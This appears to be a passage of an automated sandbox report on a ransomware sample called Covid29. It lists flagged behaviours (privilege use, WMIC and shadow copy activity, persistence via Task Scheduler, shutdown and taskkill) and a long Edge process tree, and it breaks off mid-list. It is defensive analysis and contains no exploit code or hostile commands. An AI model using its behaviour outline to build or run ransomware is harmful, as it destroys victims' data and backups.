File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\Cov29LockScreen.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\Cov29LockScreen.vbw:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\readme.txt:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (1).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\icon.jfif:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\FileExtentions.txt:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Bat To Exe Converter\settings.ini:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\23311_lores.jpg:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (2).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\Cov29LockScreen.vbp:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\Form1.frx:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (4).zip:Zone.Identifier	msedge.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
5412	PING.EXE
5524	PING.EXE
3024	PING.EXE
2916	PING.EXE
4968	PING.EXE
776	PING.EXE

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
2692	svchost.exe
5704	explorer.exe
5704	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1092	msedge.exe
1092	msedge.exe
1984	msedge.exe
1984	msedge.exe
3144	msedge.exe
3144	msedge.exe
1768	identity_helper.exe
1768	identity_helper.exe
3744	msedge.exe
3744	msedge.exe
3744	msedge.exe
3744	msedge.exe
3488	msedge.exe
3488	msedge.exe
5980	msedge.exe
5980	msedge.exe
2084	msedge.exe
2084	msedge.exe
3108	msedge.exe
3108	msedge.exe
2668	msedge.exe
2668	msedge.exe
3332	msedge.exe
3332	msedge.exe
4176	msedge.exe
4176	msedge.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
1320	Cov29Cry.exe
2692	svchost.exe
2692	svchost.exe
2692	svchost.exe
2692	svchost.exe
2692	svchost.exe
2692	svchost.exe
2692	svchost.exe
2692	svchost.exe
6112	Cov29Cry.exe
6112	Cov29Cry.exe
2692	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5704	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4936	shutdown.exe
Token: SeRemoteShutdownPrivilege	4936	shutdown.exe
Token: SeDebugPrivilege	1320	Cov29Cry.exe
Token: SeDebugPrivilege	6112	Cov29Cry.exe
Token: SeShutdownPrivilege	3700	shutdown.exe
Token: SeRemoteShutdownPrivilege	3700	shutdown.exe
Token: SeDebugPrivilege	2692	svchost.exe
Token: SeDebugPrivilege	4080	svchost.exe
Token: SeBackupPrivilege	5972	vssvc.exe
Token: SeRestorePrivilege	5972	vssvc.exe
Token: SeAuditPrivilege	5972	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1580	WMIC.exe
Token: SeSecurityPrivilege	1580	WMIC.exe
Token: SeTakeOwnershipPrivilege	1580	WMIC.exe
Token: SeLoadDriverPrivilege	1580	WMIC.exe
Token: SeSystemProfilePrivilege	1580	WMIC.exe
Token: SeSystemtimePrivilege	1580	WMIC.exe
Token: SeProfSingleProcessPrivilege	1580	WMIC.exe
Token: SeIncBasePriorityPrivilege	1580	WMIC.exe
Token: SeCreatePagefilePrivilege	1580	WMIC.exe
Token: SeBackupPrivilege	1580	WMIC.exe
Token: SeRestorePrivilege	1580	WMIC.exe
Token: SeShutdownPrivilege	1580	WMIC.exe
Token: SeDebugPrivilege	1580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1580	WMIC.exe
Token: SeRemoteShutdownPrivilege	1580	WMIC.exe
Token: SeUndockPrivilege	1580	WMIC.exe
Token: SeManageVolumePrivilege	1580	WMIC.exe
Token: 33	1580	WMIC.exe
Token: 34	1580	WMIC.exe
Token: 35	1580	WMIC.exe
Token: 36	1580	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1580	WMIC.exe
Token: SeSecurityPrivilege	1580	WMIC.exe
Token: SeTakeOwnershipPrivilege	1580	WMIC.exe
Token: SeLoadDriverPrivilege	1580	WMIC.exe
Token: SeSystemProfilePrivilege	1580	WMIC.exe
Token: SeSystemtimePrivilege	1580	WMIC.exe
Token: SeProfSingleProcessPrivilege	1580	WMIC.exe
Token: SeIncBasePriorityPrivilege	1580	WMIC.exe
Token: SeCreatePagefilePrivilege	1580	WMIC.exe
Token: SeBackupPrivilege	1580	WMIC.exe
Token: SeRestorePrivilege	1580	WMIC.exe
Token: SeShutdownPrivilege	1580	WMIC.exe
Token: SeDebugPrivilege	1580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1580	WMIC.exe
Token: SeRemoteShutdownPrivilege	1580	WMIC.exe
Token: SeUndockPrivilege	1580	WMIC.exe
Token: SeManageVolumePrivilege	1580	WMIC.exe
Token: 33	1580	WMIC.exe
Token: 34	1580	WMIC.exe
Token: 35	1580	WMIC.exe
Token: 36	1580	WMIC.exe
Token: SeBackupPrivilege	2944	wbengine.exe
Token: SeRestorePrivilege	2944	wbengine.exe
Token: SeSecurityPrivilege	2944	wbengine.exe
Token: SeDebugPrivilege	3076	taskkill.exe
Token: SeDebugPrivilege	3540	taskkill.exe
Token: SeDebugPrivilege	4696	Cov29Cry.exe
Token: SeShutdownPrivilege	3028	shutdown.exe
Token: SeRemoteShutdownPrivilege	3028	shutdown.exe
Token: SeDebugPrivilege	1372	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4328	PickerHost.exe
5472	Cov29LockScreen.exe
5312	Cov29LockScreen.exe
5704	explorer.exe
5704	explorer.exe
5704	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1984 wrote to memory of 240	1984	msedge.exe	77
PID 1984 wrote to memory of 240	1984	msedge.exe	77
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1860	1984	msedge.exe	78
PID 1984 wrote to memory of 1092	1984	msedge.exe	79
PID 1984 wrote to memory of 1092	1984	msedge.exe	79
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80
PID 1984 wrote to memory of 4484	1984	msedge.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://roblox.com
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe1d1f3cb8,0x7ffe1d1f3cc8,0x7ffe1d1f3cd8
  2⤵
  PID:240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:1860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:2580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
  2⤵
  PID:1068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
  2⤵
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6568 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1764 /prefetch:1
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:1864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
